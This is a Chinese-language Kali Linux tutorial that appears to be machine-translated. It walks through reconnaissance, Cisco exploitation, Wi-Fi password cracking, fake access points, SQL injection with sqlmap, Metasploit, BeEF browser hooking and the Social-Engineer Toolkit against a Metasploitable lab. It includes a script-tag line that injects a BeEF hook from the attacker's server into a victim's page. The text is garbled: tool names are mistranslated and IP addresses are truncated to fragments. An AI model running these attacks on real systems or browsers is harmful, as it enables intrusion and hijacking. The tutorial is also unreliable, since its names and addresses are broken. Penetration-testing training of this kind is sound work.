版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
安裝與配置信息收集工具漏洞分析工具KaliLinux-無線攻擊網(wǎng)站滲透測(cè)試KaliLinux-開發(fā)工具KaliLinux-取證工具KaliLinux——社會(huì)工程學(xué)KaliLinux-壓力工具KaliLinux-嗅探和欺騙KaliLinux-密碼破解工具KaliLinux-維護(hù)訪問KaliLinux-逆向工程KaliLinux-報(bào)告工具1、KaliLinux-安裝和配置KaliLinux是道德黑客最好的安全包之一,包含一組按類別劃分的工具。它是一個(gè)開源的,其官方網(wǎng)頁(yè)是。通常,KaliLinux可以作為操作系統(tǒng)安裝在機(jī)器中,作為我們將在下一節(jié)討論的虛擬機(jī)。安裝KaliLinux是一個(gè)實(shí)用的選擇,因?yàn)樗峁┝烁嗟墓ぷ骱徒M合工具的選項(xiàng)。您還可以創(chuàng)建實(shí)時(shí)啟動(dòng)CD或USB。所有這些都可以在以下鏈接中找到:/downloads/BackTrack是KaliLinux發(fā)行版的舊版本。最新版本是Kali2016.1,更新非常頻繁。安裝KaliLinux-首先,我們將下載VirtualBox并安裝它。稍后,我們將下載并安裝KaliLinux發(fā)行版。下載并安裝虛擬盒子當(dāng)你想在KaliLinux上測(cè)試你不確定的東西時(shí),VirtualBox特別有用。當(dāng)您想嘗試未知包或測(cè)試代碼時(shí),在VirtualBox上運(yùn)行KaliLinux是安全的。在VirtualBox的幫助下,您可以將KaliLinux安裝在您的系統(tǒng)上(而不是直接安裝在您的硬盤上)以及您的主要操作系統(tǒng),可以是MAC或Windows或其他Linux版本。讓我們了解如何在您的系統(tǒng)上下載和安裝VirtualBox。第1步-要下載,請(qǐng)轉(zhuǎn)到/wiki/Downloads。根據(jù)您的操作系統(tǒng),選擇正確的包。在這種情況下,它將是Windows的第一個(gè),如以下屏幕截圖所示。第2步-單擊下一步。第3步-下一頁(yè)將為您提供選擇要安裝應(yīng)用程序的位置的選項(xiàng)。在這種情況下,讓我們將其保留為默認(rèn)值并單擊下一步。第4步-單擊下一步,彈出以下自定義安裝屏幕截圖。選擇您要安裝的功能并單擊下一步。第5步-單擊是繼續(xù)安裝。第6步-準(zhǔn)備安裝屏幕彈出。單擊安裝。第7步-單擊完成按鈕。VirtualBox應(yīng)用程序現(xiàn)在將打開,如以下屏幕截圖所示?,F(xiàn)在我們準(zhǔn)備安裝本手冊(cè)的其余主機(jī),這也推薦用于專業(yè)用途。安裝KaliLinux現(xiàn)在我們已經(jīng)成功安裝了VirtualBox,讓我們繼續(xù)下一步并安裝KaliLinux。第1步-從其官方網(wǎng)站下載KaliLinux軟件包:/downloads/第2步-單擊VirtualBox→新建,如以下屏幕截圖所示。第3步-選擇正確的虛擬硬盤文件并單擊打開。第4步-彈出以下屏幕截圖。單擊創(chuàng)建按鈕。第5步-啟動(dòng)KaliOS。默認(rèn)用戶名是root,密碼是toor。更新Kali不斷將KaliLinux及其工具更新到新版本以保持功能非常重要。以下是更新Kali的步驟。第1步-轉(zhuǎn)到應(yīng)用程序→終端。然后,鍵入“apt-getupdate”,更新將如以下屏幕截圖所示進(jìn)行。第2步-現(xiàn)在升級(jí)工具,輸入“apt-getupgrade”,新的軟件包將被下載。第3步-它會(huì)詢問您是否要繼續(xù)。輸入“Y”和“Enter”。第4步-要升級(jí)到較新版本的操作系統(tǒng),請(qǐng)鍵入“apt-getdistupgrade”。實(shí)驗(yàn)室設(shè)置本節(jié)我們將架設(shè)另一臺(tái)測(cè)試機(jī),借助KaliLinux的工具進(jìn)行測(cè)試。第1步-下載Metasploitable,這是一臺(tái)Linux機(jī)器??梢詮腞apid7官網(wǎng)下載:/metasploitabledownload.html?LS=1631875&CS=web第2步-通過提供您的詳細(xì)信息進(jìn)行注冊(cè)。填寫完上面的表格后,我們就可以下載軟件了。第3步-單擊VirtualBox→新建。第4步-單擊“使用現(xiàn)有的虛擬硬盤文件”。瀏覽您下載Metasploitable的文件,然后單擊打開。第5步-彈出創(chuàng)建虛擬機(jī)的屏幕。單擊“創(chuàng)建”。默認(rèn)用戶名是msfadmin,密碼是msfadmin。2、KaliLinux-信息收集工具在本章中,我們將討論KaliLinux的信息收集工具。NMAP和ZenMAPNMAP和ZenMAP是KaliLinux中道德黑客掃描階段的有用工具。NMAP和ZenMAP實(shí)際上是相同的工具,但是NMAP使用命令行而ZenMAP有GUI。NMAP是用于網(wǎng)絡(luò)發(fā)現(xiàn)和安全審計(jì)的免費(fèi)實(shí)用工具。許多系統(tǒng)和網(wǎng)絡(luò)管理員還發(fā)現(xiàn)它對(duì)于網(wǎng)絡(luò)清單、管理服務(wù)升級(jí)計(jì)劃以及監(jiān)控主機(jī)或服務(wù)正常運(yùn)行時(shí)間等任務(wù)很有用。NMAP以新穎的方式使用原始IP數(shù)據(jù)包來確定網(wǎng)絡(luò)上可用的主機(jī)、這些主機(jī)提供的服務(wù)(應(yīng)用程序名稱和版本)、它們運(yùn)行的??操作系統(tǒng)(和操作系統(tǒng)版本)、數(shù)據(jù)包過濾器/防火墻的類型正在使用等現(xiàn)在,讓我們一步步學(xué)習(xí)如何使用NMAP和ZenMAP。第1步-要打開,請(qǐng)轉(zhuǎn)到應(yīng)用程序→01-信息收集→nmap或zenmap。第2步-下一步是檢測(cè)目標(biāo)主機(jī)的操作系統(tǒng)類型/版本。根據(jù)NMAP提示的幫助,操作系統(tǒng)類型/版本檢測(cè)的參數(shù)是變量“-O”。有關(guān)更多信息,請(qǐng)使用此鏈接:/book/man-os-detection.html我們將使用的命令是-nmap-O01以下屏幕截圖顯示了您需要在何處鍵入上述命令以查看Nmap輸出-第3步-接下來,打開TCP和UDP端口。要基于NMAP掃描所有TCP端口,請(qǐng)使用以下命令-nmap-p1-65535-T401其中參數(shù)“-p”表示所有需要掃描的TCP端口。在這種情況下,我們正在掃描所有端口,“-T4”是NMAP必須運(yùn)行的掃描速度。以下是結(jié)果。綠色是所有TCP開放端口,紅色是所有關(guān)閉端口。但是,由于列表太長(zhǎng),NMAP不顯示。隱形掃描Stealthscan或SYN也稱為half-openscan,因?yàn)樗煌瓿蒚CP三向握手。黑客向目標(biāo)發(fā)送SYN數(shù)據(jù)包;如果收到返回的SYN/ACK幀,則假定目標(biāo)將完成連接并且端口正在偵聽。如果從目標(biāo)接收到RST,則假定該端口未激活或已關(guān)閉?,F(xiàn)在要實(shí)際查看SYN掃描,請(qǐng)?jiān)贜MAP中使用參數(shù)–sS。以下是完整命令-nmap-sS-T401以下屏幕截圖顯示了如何使用此命令-搜索漏洞Searchsploit是一種工具,可幫助KaliLinux用戶使用命令行直接從Exploit數(shù)據(jù)庫(kù)存檔中進(jìn)行搜索。要打開它,請(qǐng)轉(zhuǎn)到應(yīng)用程序→08-ExploitationTools→searchsploit,如以下屏幕截圖所示。打開終端后,輸入“
searchsploitexploitindexname
”。域名解析工具在本節(jié)中,我們將學(xué)習(xí)如何使用Kali內(nèi)置的一些DNS工具?;旧希@些工具有助于區(qū)域傳輸或域IP解決問題。dnsenum.pl第一個(gè)工具是dnsenum.pl,它是一個(gè)PERL腳本,可幫助獲取MX、A和其他記錄連接到域。單擊左側(cè)面板上的終端。輸入“dnsenumdomainname”,將顯示所有記錄。在本例中,它顯示A記錄。DNSMAP第二個(gè)工具是DNSMAP,它有助于查找我們正在搜索的與該域相關(guān)聯(lián)的電話號(hào)碼、聯(lián)系人和其他子域。下面是一個(gè)例子。點(diǎn)擊上一節(jié)的終端,然后輸入“dnsmap域名”儀表盤第三個(gè)工具是dnstracer,它確定給定域名服務(wù)器(DNS)從何處獲取給定主機(jī)名的信息。單擊上一節(jié)中的終端,然后鍵入“dnstracer域名”。LBD工具LBD(負(fù)載平衡檢測(cè)器)工具非常有趣,因?yàn)樗鼈兛梢詸z測(cè)給定域是否使用DNS和/或HTTP負(fù)載平衡。這很重要,因?yàn)槿绻袃膳_(tái)服務(wù)器,那么其中一臺(tái)可能不會(huì)更新,您可以嘗試?yán)盟?。以下是使用它的步驟-首先,單擊左側(cè)面板上的終端。然后,鍵入“l(fā)bd域名”。如果它產(chǎn)生的結(jié)果為“FOUND”,則意味著服務(wù)器具有負(fù)載平衡。在這種情況下,結(jié)果是“未找到”。平安3Hping3被道德黑客廣泛使用。它與ping工具幾乎相似,但更高級(jí),因?yàn)樗梢岳@過防火墻過濾器并使用TCP、UDP、ICMP和RAW-IP協(xié)議。它具有跟蹤路由模式和在覆蓋通道之間發(fā)送文件的能力。單擊左側(cè)面板上的終端。鍵入“hping3–h”,它將顯示如何使用此命令。另一個(gè)命令是“hping3域或IP參數(shù)”3、KaliLinux-漏洞分析工具在本章中,我們將學(xué)習(xí)如何使用一些工具來幫助我們利用設(shè)備或應(yīng)用程序來獲取訪問權(quán)限。思科工具Kali有一些可用于利用Cisco路由器的工具。一種這樣的工具是Cisco-torch,它用于大規(guī)模掃描、指紋識(shí)別和利用。讓我們通過單擊左窗格打開終端控制臺(tái)。然后,輸入“cisco-torch–parameterIPofhost”,如果沒有發(fā)現(xiàn)任何可利用的東西,則會(huì)顯示以下結(jié)果。要查看可以使用的參數(shù)是什么,請(qǐng)鍵入“cisco-torch?”思科審計(jì)工具它是一個(gè)PERL腳本,用于掃描Cisco路由器的常見漏洞。要使用它,請(qǐng)?jiān)俅未蜷_左窗格中的終端,如上一節(jié)所示,然后鍵入“CAT–h主機(jī)名或IP”。您可以添加端口參數(shù)“-p”,如以下屏幕截圖所示,在本例中為23以對(duì)其進(jìn)行暴力破解。思科全球開發(fā)者CiscoGlobalExploiter(CGE)是一種高級(jí)、簡(jiǎn)單且快速的安全測(cè)試工具。使用這些工具,您可以執(zhí)行多種類型的攻擊,如以下屏幕截圖所示。但是,在實(shí)際環(huán)境中進(jìn)行測(cè)試時(shí)要小心,因?yàn)槠渲幸恍┛赡軙?huì)使Cisco設(shè)備崩潰。例如,選項(xiàng)可以停止服務(wù)。要使用此工具,請(qǐng)輸入“cge.pl
IPaddress
numberofvulnerability”以下屏幕截圖顯示了針對(duì)上述列表中的第3號(hào)漏洞在Cisco路由器上執(zhí)行的測(cè)試結(jié)果。結(jié)果顯示漏洞被成功利用。床BED是一個(gè)程序,旨在檢查守護(hù)進(jìn)程是否存在潛在的緩沖區(qū)溢出、格式字符串等。阿爾。本例中,我們將測(cè)試IP為02、協(xié)議為HTTP的測(cè)試機(jī)。該命令將是“bed–sHTTP–t02”,測(cè)試將繼續(xù)。4、KaliLinux-無線攻擊在本章中,我們將學(xué)習(xí)如何使用KaliLinux內(nèi)置的Wi-Fi破解工具。但是,重要的是您擁有的無線網(wǎng)卡支持監(jiān)控模式。蕨類Wifi餅干FernWificracker是Kali破解無線必備的工具之一。在打開Fern之前,我們應(yīng)該將無線網(wǎng)卡設(shè)置為監(jiān)控模式。為此,請(qǐng)?jiān)诮K端中鍵入“airmon-ngstartwlan-0”?,F(xiàn)在,打開FernWirelessCracker。第1步-應(yīng)用程序→單擊“無線攻擊”→“FernWirelessCracker”。Step2
-選擇無線網(wǎng)卡,如下圖所示。第3步-單擊“掃描訪問點(diǎn)”。第4步-完成掃描后,它將顯示找到的所有無線網(wǎng)絡(luò)。在這種情況下,只找到“WPA網(wǎng)絡(luò)”。第5步-單擊WPA網(wǎng)絡(luò),如上圖所示。它顯示所有找到的無線。通常,在WPA網(wǎng)絡(luò)中,它會(huì)執(zhí)行字典攻擊。第6步-單擊“瀏覽”并找到用于攻擊的詞表。第7步-單擊“Wifi攻擊”。第8步-完成字典攻擊后,它找到了密碼,如下圖所示。天命Kismet是一款WIFI網(wǎng)絡(luò)分析工具。它是一個(gè)802.11第2層無線網(wǎng)絡(luò)檢測(cè)器、嗅探器和入侵檢測(cè)系統(tǒng)。它適用于任何支持原始監(jiān)控(rfmon)模式的無線網(wǎng)卡,并且可以嗅探802.11a/b/g/n流量。它通過收集數(shù)據(jù)包和隱藏網(wǎng)絡(luò)來識(shí)別網(wǎng)絡(luò)。要使用它,請(qǐng)將無線網(wǎng)卡設(shè)置為監(jiān)控模式,然后在終端中輸入“airmon-ngstartwlan-0”。讓我們學(xué)習(xí)如何使用這個(gè)工具。第1步-要啟動(dòng)它,請(qǐng)打開終端并鍵入“kismet”。第2步-單擊“確定”。第3步-當(dāng)它要求啟動(dòng)Kismet服務(wù)器時(shí)單擊“是”。否則它將停止運(yùn)行。第4步-啟動(dòng)選項(xiàng),保留默認(rèn)值。單擊“開始”。第5步-現(xiàn)在它會(huì)顯示一個(gè)表格,要求您定義無線網(wǎng)卡。在這種情況下,單擊是。第6步-在這種情況下,無線源是“wlan0”。它必須寫在“Intf”部分→單擊“添加”。第7步-它將開始嗅探wifi網(wǎng)絡(luò),如以下屏幕截圖所示。第8步-單擊任何網(wǎng)絡(luò),它會(huì)生成無線詳細(xì)信息,如以下屏幕截圖所示。地理信息系統(tǒng)GISKismet是一種無線可視化工具,以實(shí)用的方式表示使用Kismet收集的數(shù)據(jù)。GISKismet將信息存儲(chǔ)在數(shù)據(jù)庫(kù)中,因此我們可以使用SQL查詢數(shù)據(jù)并生成圖表。GISKismet目前使用SQLite作為數(shù)據(jù)庫(kù),使用GoogleEarth/KML文件進(jìn)行繪圖。讓我們學(xué)習(xí)如何使用這個(gè)工具。第1步-要打開GISKismet,請(qǐng)轉(zhuǎn)到:應(yīng)用程序→單擊“無線攻擊”→giskismet。您還記得在上一節(jié)中,我們使用Kismet工具探索有關(guān)無線網(wǎng)絡(luò)的數(shù)據(jù)以及Kismet將所有這些數(shù)據(jù)打包在netXML文件中。第2步-要將此文件導(dǎo)入Giskismet,鍵入“root@kali:~#giskismet-xKxml”,它將開始導(dǎo)入文件。導(dǎo)入后,我們可以將它們導(dǎo)入GoogleEarth我們之前找到的熱點(diǎn)。第3步-假設(shè)我們已經(jīng)安裝了GoogleEarth,我們單擊文件→打開Giskismet創(chuàng)建的文件→單擊“打開”。將顯示以下地圖。幽靈網(wǎng)絡(luò)釣魚者GhostPhisher是一種流行的工具,可幫助創(chuàng)建偽造的無線接入點(diǎn),然后再創(chuàng)建中間人攻擊。第1步-要打開它,請(qǐng)單擊“應(yīng)用程序”→“無線攻擊”→“幽靈網(wǎng)絡(luò)釣魚”。第2步-打開后,我們將使用以下詳細(xì)信息設(shè)置假AP。無線接口輸入:wlan0SSID:無線AP名稱IP地址:AP將擁有的IPWAP:將使用此SSID進(jìn)行連接的密碼第3步-單擊“開始”按鈕。無線網(wǎng)它是另一種無線破解工具,可以連續(xù)攻擊多個(gè)WEP、WPA、WPS加密網(wǎng)絡(luò)。首先,無線網(wǎng)卡必須處于監(jiān)控模式。第1步-打開它,轉(zhuǎn)到應(yīng)用程序→無線攻擊→Wifite。第2步-鍵入“wifite–showb”以掃描網(wǎng)絡(luò)。第3步-要開始攻擊無線網(wǎng)絡(luò),請(qǐng)單擊Ctrl+C。第4步-鍵入“1”以破解第一個(gè)無線。第5步-攻擊完成后,將找到密鑰。5、KaliLinux-網(wǎng)站滲透測(cè)試在本章中,我們將了解KaliLinux提供的網(wǎng)站滲透測(cè)試??椗怯梅╒ega是一個(gè)免費(fèi)開源的掃描器和測(cè)試平臺(tái),用于測(cè)試Web應(yīng)用程序的安全性。Vega可以幫助您查找和驗(yàn)證SQL注入、跨站點(diǎn)腳本(XSS)、無意中泄露的敏感信息和其他漏洞。它是用Java編寫的,基于GUI,可在Linux、OSX和Windows上運(yùn)行。Vega包括一個(gè)用于快速測(cè)試的自動(dòng)掃描儀和一個(gè)用于戰(zhàn)術(shù)檢查的攔截代理。Vega可以使用網(wǎng)絡(luò)語言中強(qiáng)大的API進(jìn)行擴(kuò)展:JavaScript。官方網(wǎng)頁(yè)是/vega/第1步-打開Vega轉(zhuǎn)到應(yīng)用程序→03-Web應(yīng)用程序分析→Vega第2步-如果您沒有在路徑中看到應(yīng)用程序,請(qǐng)鍵入以下命令。第3步-要開始掃描,請(qǐng)單擊“+”號(hào)。第4步-輸入將被掃描的網(wǎng)頁(yè)URL。在這種情況下,它是metasploitable機(jī)器→單擊“下一步”。第5步-選中要控制的模塊的所有框。然后,單擊“下一步”。第6步-在以下屏幕截圖中再次單擊“下一步”。第7步-單擊“完成”。第8步-如果彈出下表,請(qǐng)單擊“是”。掃描將繼續(xù),如以下屏幕截圖所示。第9步-掃描完成后,在左側(cè)面板上,您可以看到根據(jù)嚴(yán)重程度分類的所有結(jié)果。如果單擊它,您將在右側(cè)面板上看到漏洞的所有詳細(xì)信息,例如“請(qǐng)求”、“討論”、“影響”和“修復(fù)”。Zap代理ZAP-OWASPZedAttackProxy是一種易于使用的集成滲透測(cè)試工具,用于查找Web應(yīng)用程序中的漏洞。它是一個(gè)Java接口。第1步-要打開ZapProxy,請(qǐng)轉(zhuǎn)到應(yīng)用程序→03-Web應(yīng)用程序分析→owaspzap。第2步-單擊“接受”。ZAP將開始加載。第3步-從以下屏幕截圖中選擇一個(gè)選項(xiàng),然后單擊“開始”。以下網(wǎng)站可通過IP進(jìn)行metasploitable:01第4步-在“URLtoattack”中輸入測(cè)試網(wǎng)站的URL→單擊“Attack”。掃描完成后,您將在左上面板看到所有已抓取的站點(diǎn)。在左側(cè)面板“警報(bào)”中,您將看到所有發(fā)現(xiàn)以及描述。第5步-單擊“蜘蛛”,您將看到所有掃描的鏈接。數(shù)據(jù)庫(kù)工具使用sqlmapsqlmap是一種開源滲透測(cè)試工具,可自動(dòng)執(zhí)行檢測(cè)和利用SQL注入漏洞以及接管數(shù)據(jù)庫(kù)服務(wù)器的過程。它配備了強(qiáng)大的檢測(cè)引擎、終極滲透測(cè)試器的許多利基功能以及范圍廣泛的開關(guān),從數(shù)據(jù)庫(kù)指紋識(shí)別、從數(shù)據(jù)庫(kù)中獲取數(shù)據(jù),到訪問底層文件系統(tǒng)和通過輸出在操作系統(tǒng)上執(zhí)行命令。帶外連接。讓我們學(xué)習(xí)如何使用sqlmap。第1步-要打開sqlmap,請(qǐng)轉(zhuǎn)到應(yīng)用程序→04-數(shù)據(jù)庫(kù)評(píng)估→sqlmap。具有SQL注入易受攻擊參數(shù)的網(wǎng)頁(yè)是metasploitable。第2步-要開始sql注入測(cè)試,請(qǐng)鍵入“sqlmap–u受害者的URL”第3步-從結(jié)果中,您會(huì)看到某些變量是易受攻擊的。忍者sqlninja是MicrosoftSQLServer上的SQL注入,可實(shí)現(xiàn)完整的GUI訪問。sqlninja是一種旨在利用使用MicrosoftSQLServer作為其后端的Web應(yīng)用程序上的SQL注入漏洞的工具。有關(guān)此工具的完整信息,請(qǐng)?jiān)L問/第1步-要打開sqlninja,請(qǐng)轉(zhuǎn)到應(yīng)用程序→04-數(shù)據(jù)庫(kù)評(píng)估→sqlninja。CMS掃描工具WPS掃描WPScan是一個(gè)黑盒WordPress漏洞掃描器,可用于掃描遠(yuǎn)程WordPress安裝以查找安全問題。第1步-打開WPscan轉(zhuǎn)到應(yīng)用程序→03-Web應(yīng)用程序分析→“wpscan”。彈出以下屏幕截圖。第2步-要掃描網(wǎng)站的漏洞,請(qǐng)鍵入“wpscan–u網(wǎng)頁(yè)的URL”。如果掃描儀未更新,它會(huì)要求您更新。我會(huì)建議這樣做。掃描開始后,您將看到結(jié)果。在以下屏幕截圖中,漏洞由紅色箭頭指示。掃一掃由于其靈活性,Joomla可能是目前使用最廣泛的CMS。對(duì)于此CMS,它是一個(gè)Joomla掃描儀。它將幫助網(wǎng)絡(luò)開發(fā)人員和網(wǎng)絡(luò)管理員識(shí)別他們部署的Joomla站點(diǎn)上可能存在的安全漏洞。第1步-要打開它,只需單擊終端的左側(cè)面板,然后單擊“joomscan–parameter”。第2步-獲得有關(guān)使用類型“joomscan/?”的幫助第3步-要開始掃描,請(qǐng)鍵入“joomscan–u受害者的URL”。結(jié)果將如以下屏幕截圖所示顯示。SSL掃描工具TLSSLed是一個(gè)Linuxshell腳本,用于評(píng)估目標(biāo)SSL/TLS(HTTPS)Web服務(wù)器實(shí)現(xiàn)的安全性。它基于sslscan,一個(gè)基于openssl庫(kù)和“openssls_client”命令行工具的全面SSL/TLS掃描器。當(dāng)前的測(cè)試包括檢查目標(biāo)是否支持SSLv2協(xié)議、NULL密碼、基于密鑰長(zhǎng)度(40或56位)的弱密碼、強(qiáng)密碼(如AES)的可用性、數(shù)字證書是否經(jīng)過MD5簽名,以及當(dāng)前的SSL/TLS重新協(xié)商能力。要開始測(cè)試,請(qǐng)打開終端并輸入“tlssledURL端口”。它將開始測(cè)試證書以查找數(shù)據(jù)。從結(jié)果中可以看出,證書有效期至2018年,如以下屏幕截圖中的綠色所示。w3afw3af是一個(gè)Web應(yīng)用程序攻擊和審計(jì)框架,旨在識(shí)別和利用所有Web應(yīng)用程序漏洞。這個(gè)包為框架提供了一個(gè)圖形用戶界面(GUI)。如果您只需要命令行應(yīng)用程序,請(qǐng)安裝w3af-console。該框架被稱為“web的metasploit”,但它實(shí)際上更多,因?yàn)樗€使用黑盒掃描技術(shù)發(fā)現(xiàn)web應(yīng)用程序漏洞。w3af核心及其插件完全用Python編寫。該項(xiàng)目有130多個(gè)插件,可識(shí)別和利用SQL注入、跨站點(diǎn)腳本(XSS)、遠(yuǎn)程文件包含等。第1步-打開它,轉(zhuǎn)到應(yīng)用程序→03-Web應(yīng)用程序分析→單擊w3af。第2步-在“目標(biāo)”上輸入受害者的URL,在這種情況下將是metasploitable網(wǎng)址。第3步-選擇配置文件→單擊“開始”。第4步-轉(zhuǎn)到“結(jié)果”,您可以看到包含詳細(xì)信息的發(fā)現(xiàn)。6、KaliLinux-開發(fā)工具在本章中,我們將了解KaliLinux提供的各種漏洞利用工具。元漏洞正如我們之前提到的,Metasploit是Rapid7的產(chǎn)品,大部分資源都可以在他們的網(wǎng)頁(yè)上找到。它有兩個(gè)版本——商業(yè)版和免費(fèi)版。這兩個(gè)版本之間的差異并不大,因此在本例中我們將使用社區(qū)版本(免費(fèi))。作為一名道德黑客,您將使用嵌入了Metasploit社區(qū)版本的“KaliDitribution”,以及其他通過節(jié)省安裝時(shí)間而非常舒適的道德黑客工具。但是,如果您想作為單獨(dú)的工具安裝,它是一個(gè)可以安裝在Linux、Windows和OSX等操作系統(tǒng)中的應(yīng)用程序。首先,在Kali中打開Metasploit控制臺(tái)。然后,轉(zhuǎn)到應(yīng)用程序→開發(fā)工具→Metasploit。啟動(dòng)后,您將看到以下屏幕,其中Metasploit的版本以紅色下劃線標(biāo)出。在控制臺(tái)中,如果您使用幫助或?符號(hào),它將向您顯示一個(gè)列表,其中包含MSP命令及其描述。您可以根據(jù)您的需要和您將使用的內(nèi)容進(jìn)行選擇。另一個(gè)重要的管理命令是msfupdate,它有助于使用最新的漏洞利用更新metasploit。在控制臺(tái)中運(yùn)行此命令后,您將需要等待幾分鐘,直到更新完成。它有一個(gè)名為“搜索”的好命令,您可以使用它來查找您想要的內(nèi)容,如以下屏幕截圖所示。例如,我想查找與微軟相關(guān)的漏洞,命令可以是msf>searchname:Microsofttype:exploit。其中“search”是命令,“name”是我們要查找的對(duì)象的名稱,“type”是我們要查找的腳本類型。另一個(gè)命令是“信息”。它提供有關(guān)使用模塊或平臺(tái)的信息、作者是誰、漏洞參考以及可能具有的負(fù)載限制。阿米蒂奇ArmitageGUIformetasploit是metasploit的補(bǔ)充工具。它可視化目標(biāo)、推薦漏洞利用并公開高級(jí)的漏洞利用后功能。讓我們打開它,但首先應(yīng)該打開并啟動(dòng)metasploit控制臺(tái)。要打開Armitage,請(qǐng)轉(zhuǎn)至應(yīng)用程序→漏洞利用工具→Armitage。單擊“連接”按鈕,如以下屏幕截圖所示。當(dāng)它打開時(shí),您將看到以下屏幕。Armitage是用戶友好的。“目標(biāo)”區(qū)域列出了所有你發(fā)現(xiàn)的和你正在使用的機(jī)器,被黑的目標(biāo)是紅色的,上面有雷雨。破解目標(biāo)后,您可以右鍵單擊它并繼續(xù)探索您需要做的事情,例如探索(瀏覽)文件夾。在以下GUI中,您將看到文件夾視圖,稱為控制臺(tái)。只需單擊文件夾,您就可以瀏覽文件夾,而無需metasploit命令。在GUI的右側(cè),是列出漏洞模塊的部分。牛肉BeEF代表瀏覽器開發(fā)框架。它是一個(gè)專注于網(wǎng)絡(luò)瀏覽器的滲透測(cè)試工具。BeEF允許專業(yè)滲透測(cè)試人員使用客戶端攻擊向量評(píng)估目標(biāo)環(huán)境的實(shí)際安全態(tài)勢(shì)。首先,您必須使用以下命令更新Kali包-root@kali:/#apt-getupdateroot@kali:/#apt-getinstallbeef-xss要開始,請(qǐng)使用以下命令-root@kali:/#cd/usr/share/beef-xssroot@kali:/#./beef打開瀏覽器,輸入用戶名和密碼:beef。BeEF掛鉤是托管在BeEF服務(wù)器上的JavaScript文件,需要在客戶端瀏覽器上運(yùn)行。當(dāng)它這樣做時(shí),它會(huì)回調(diào)BeEF服務(wù)器,傳達(dá)有關(guān)目標(biāo)的大量信息。它還允許針對(duì)目標(biāo)運(yùn)行其他命令和模塊。在此示例中,BeEF掛鉤的位置為01:3000/hook.js。為了攻擊瀏覽器,在客戶端將要查看的頁(yè)面中包含JavaScript掛鉤。有多種方法可以做到這一點(diǎn),但最簡(jiǎn)單的方法是將以下內(nèi)容插入頁(yè)面并以某種方式讓客戶端打開它。<scriptsrc="01:3000/hook.js"type="text/javascript"></script>頁(yè)面加載后,返回BeEF控制面板并單擊左上角的“在線瀏覽器”。幾秒鐘后,您應(yīng)該會(huì)看到您的IP地址彈出窗口,代表一個(gè)掛鉤的瀏覽器。將鼠標(biāo)懸停在IP上將快速提供瀏覽器版本、操作系統(tǒng)以及安裝了哪些插件等信息。要遠(yuǎn)程運(yùn)行該命令,請(qǐng)單擊“擁有”主機(jī)。然后,在命令上單擊要執(zhí)行的模塊,最后單擊“執(zhí)行”。Linux漏洞利用建議器它建議在給定Linux操作系統(tǒng)的發(fā)行版本“uname-r”的情況下可能存在的漏洞。要運(yùn)行它,請(qǐng)鍵入以下命令-root@kali:/usr/share/linux-exploit-suggester#./Linux_Exploit_Suggester.pl-k3.0.03.0.0是我們要利用的Linux操作系統(tǒng)的內(nèi)核版本。7、KaliLinux-取證工具在本章中,我們將了解KaliLinux中可用的取證工具。p0fp0f是一種工具,即使相關(guān)設(shè)備位于數(shù)據(jù)包防火墻后面,它也可以通過檢查捕獲的數(shù)據(jù)包來識(shí)別目標(biāo)主機(jī)的操作系統(tǒng)。P0f不會(huì)產(chǎn)生任何額外的網(wǎng)絡(luò)流量,無論是直接的還是間接的;沒有名稱查找;沒有神秘的探測(cè)器;沒有ARIN查詢;沒有什么。在高級(jí)用戶手中,P0f可以檢測(cè)防火墻的存在、NAT的使用和負(fù)載平衡器的存在。在終端輸入“p0f-h”,看看如何使用,你會(huì)得到如下結(jié)果。它甚至?xí)谐隹捎玫慕涌?。然后,鍵入以下命令:“p0f–ieth0–p-o文件名”。其中參數(shù)“-i”為接口名稱,如上所示。“-p”表示它處于混雜模式?!?o”表示輸出將保存在文件中。打開地址為的網(wǎng)頁(yè)從結(jié)果中可以看出,Web服務(wù)器使用的是apache2.x,操作系統(tǒng)是Debian。pdf解析器pdf-parser是一種解析PDF文檔以識(shí)別所分析的pdf文件中使用的基本元素的工具。它不會(huì)呈現(xiàn)PDF文檔。不建議將其用于PDF解析器的教科書案例,但它可以完成工作。通常,這用于您懷疑其中嵌入了腳本的pdf文件。命令是-pdf-parser-o10filepath其中“-o”是對(duì)象的數(shù)量。如您在以下屏幕截圖中所見,pdf文件打開了一個(gè)CMD命令。矮胖子Dumpzilla應(yīng)用程序是在Python3.x中開發(fā)的,目的是提取Firefox、Iceweasel和Seamonkey瀏覽器的所有取證有趣信息進(jìn)行分析。救援它將數(shù)據(jù)從一個(gè)文件或塊設(shè)備(硬盤、cdrom等)復(fù)制到另一個(gè)文件或塊設(shè)備(硬盤、cdrom等),在讀取錯(cuò)誤的情況下首先嘗試挽救好的部分。ddrescue的基本操作是全自動(dòng)的。也就是說,您不必等待錯(cuò)誤、停止程序、從新位置重新啟動(dòng)程序等。如果您使用ddrescue的mapfile功能,則可以非常有效地挽救數(shù)據(jù)(僅讀取所需的塊)。此外,您可以隨時(shí)中斷救援并稍后在同一時(shí)間恢復(fù)。映射文件是ddrescue有效性的重要組成部分。除非您知道自己在做什么,否則請(qǐng)使用它。命令行是-dd_rescueinfilepathoutfilepath參數(shù)“–v”表示冗長(zhǎng)?!?dev/sdb”是要拯救的文件夾。img文件是恢復(fù)的圖像。DFF它是另一種用于恢復(fù)文件的取證工具。它也有一個(gè)GUI。要打開它,請(qǐng)?jiān)诮K端中鍵入“dff-gui”,然后將打開以下WebGUI。單擊文件→“打開證據(jù)”。將打開下表。選中“原始格式”并單擊“+”以選擇要恢復(fù)的文件夾。然后,您可以瀏覽窗格左側(cè)的文件以查看已恢復(fù)的內(nèi)容。8、KaliLinux——社會(huì)工程學(xué)在本章中,我們將了解KaliLinux中使用的社會(huì)工程工具。社會(huì)工程工具包使用Social
-EngineerToolkit
(SET)是一個(gè)開源滲透測(cè)試框架,專為社會(huì)工程而設(shè)計(jì)。SET有許多自定義攻擊向量,可讓您在短時(shí)間內(nèi)做出可信的攻擊。這些工具使用人類行為來誘騙他們進(jìn)入攻擊媒介。讓我們學(xué)習(xí)如何使用社會(huì)工程師工具包。第1步-要打開SET,請(qǐng)轉(zhuǎn)到應(yīng)用程序→社會(huì)工程工具→單擊“SET”社會(huì)工程工具。第2步-它會(huì)詢問您是否同意使用條款。鍵入“y”,如以下屏幕截圖所示。第3步-以下屏幕截圖中顯示的大多數(shù)菜單都是不言自明的,其中最重要的是數(shù)字1“社會(huì)工程攻擊”。第4步-鍵入“1”
